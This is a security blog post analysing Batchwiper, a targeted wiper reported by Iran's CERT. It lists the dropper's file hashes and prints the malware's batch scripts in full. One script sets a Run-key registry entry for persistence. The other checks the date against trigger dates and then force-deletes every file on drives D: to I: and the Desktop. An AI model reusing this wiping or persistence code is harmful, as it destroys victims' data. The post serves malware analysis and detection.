Batchwiper: Just Another Wiping Malware

December 17, 2012  |  Jaime Blasco

A few days ago, The Iranian CERT (Maher Center) released information about a new identified targeted malware with wiping capabilities. The piece of code is very simple and it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

WINDOWSsystem32SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

WINDOWSsystem32jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

WINDOWSsystem32juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

The juboot.exe is executed. The following bat file is created and executed:

Documents and Settings%User%Local SettingsTemp.tmpjuboot.bat

@echo off & setlocal

sleep for 2

REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d “%systemroot%system32jucheck.exe” /f

start “” /D”%systemroot%system32” “jucheck.exe”

As you can see the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence executing the jucheck.exe file everytime the system boots.

Then jucheck.exe is executed that creates the file Documents and SettingsAdministratorLocal SettingsTemp.tmpjucheck.bat:

@echo off & setlocal

sleep for 2

del “%systemroot%system32juboot.exe” /q /s /f

del “%userprofile%Start MenuProgramsStartupGrooveMonitor.exe” /q /s /f

if “%date%”==“Mon 12/10/2012” goto yes

if “%date%”==“Tue 12/11/2012” goto yes

if “%date%”==“Wed 12/12/2012” goto yes

if “%date%”==“Mon 01/21/2013” goto yes

if “%date%”==“Tue 01/22/2013” goto yes

if “%date%”==“Wed 01/23/2013” goto yes

if “%date%”==“Mon 05/06/2013” goto yes

if “%date%”==“Tue 05/07/2013” goto yes

if “%date%”==“Wed 05/08/2013” goto yes

if “%date%”==“Mon 07/22/2013” goto yes

if “%date%”==“Tue 07/23/2013” goto yes

if “%date%”==“Wed 07/24/2013” goto yes

if “%date%”==“Mon 11/11/2013” goto yes

if “%date%”==“Tue 11/12/2013” goto yes

if “%date%”==“Wed 11/13/2013” goto yes

if “%date%”==“Mon 02/03/2014” goto yes

if “%date%”==“Tue 02/04/2014” goto yes

if “%date%”==“Wed 02/05/2014” goto yes

if “%date%”==“Mon 05/05/2014” goto yes

if “%date%”==“Tue 05/06/2014” goto yes

if “%date%”==“Wed 05/07/2014” goto yes

if “%date%”==“Mon 08/11/2014” goto yes

if “%date%”==“Tue 08/12/2014” goto yes

if “%date%”==“Wed 08/13/2014” goto yes

if “%date%”==“Mon 02/02/2015” goto yes

if “%date%”==“Tue 02/03/2015” goto yes

if “%date%”==“Wed 02/04/2015” goto yes

goto no


sleep for 3000

IF EXIST d: del “d:*.*” /q /s /f

IF EXIST d: Chkdsk d:

IF EXIST e: del “e:*.*” /q /s /f

IF EXIST e: Chkdsk e:

IF EXIST f: del “f:*.*” /q /s /f

IF EXIST f: Chkdsk f:

IF EXIST g: del “g:*.*” /q /s /f

IF EXIST g: Chkdsk g:

IF EXIST h: del “h:*.*” /q /s /f

IF EXIST h: Chkdsk h:

IF EXIST i: del “i:*.*” /q /s /f

IF EXIST i: Chkdsk i:

del “%userprofile%Desktop*.*” /q /s /f

\start calc


As you can see when the bat file is executed, the juboot.exe file is deleted as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat files checks the system date and if it matches one of the predefined dates  it executes the wiping routine. This routine checks for system drives and it then deletes every file on those drives. Finally it deletes the userprofile folder.

We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.


Share this with others

Tags: iran, wiper, maher

Get price Free trial